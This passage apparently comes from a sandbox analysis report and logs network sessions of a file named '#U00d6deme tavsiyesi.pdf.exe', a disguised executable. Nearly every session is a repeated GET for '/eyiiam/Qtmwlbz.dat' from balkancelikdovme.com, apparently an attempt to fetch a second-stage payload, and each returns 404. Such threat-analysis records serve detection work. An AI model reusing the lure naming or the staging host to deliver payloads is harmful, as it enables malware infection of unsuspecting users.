      2024-12-16 13:20:59 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      105192.168.2.750075185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:01 UTC88OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      Connection: Keep-Alive
      2024-12-16 13:21:01 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:01 GMT
      vary: User-Agent
      2024-12-16 13:21:01 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      106192.168.2.750076185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:03 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:03 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:03 GMT
      vary: User-Agent
      2024-12-16 13:21:03 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      107192.168.2.750077185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:05 UTC88OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      Connection: Keep-Alive
      2024-12-16 13:21:05 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:05 GMT
      vary: User-Agent
      2024-12-16 13:21:05 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      108192.168.2.750078185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:06 UTC88OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      Connection: Keep-Alive
      2024-12-16 13:21:07 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:07 GMT
      vary: User-Agent
      2024-12-16 13:21:07 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      109192.168.2.750079185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:08 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:09 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:09 GMT
      vary: User-Agent
      2024-12-16 13:21:09 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      110192.168.2.750080185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:10 UTC88OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      Connection: Keep-Alive
      2024-12-16 13:21:11 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:10 GMT
      vary: User-Agent
      2024-12-16 13:21:11 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      111192.168.2.750081185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:12 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:13 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:12 GMT
      vary: User-Agent
      2024-12-16 13:21:13 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      112192.168.2.750082185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:14 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:14 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:14 GMT
      vary: User-Agent
      2024-12-16 13:21:14 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      113192.168.2.750083185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:16 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:16 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:16 GMT
      vary: User-Agent
      2024-12-16 13:21:16 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      114192.168.2.750084185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:18 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:18 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:18 GMT
      vary: User-Agent
      2024-12-16 13:21:18 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      115192.168.2.750085185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:19 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:20 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:20 GMT
      vary: User-Agent
      2024-12-16 13:21:20 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      116192.168.2.750086185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:21 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:22 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:22 GMT
      vary: User-Agent
      2024-12-16 13:21:22 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      117192.168.2.750087185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:23 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:24 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:24 GMT
      vary: User-Agent
      2024-12-16 13:21:24 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      118192.168.2.750088185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:25 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:26 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:25 GMT
      vary: User-Agent
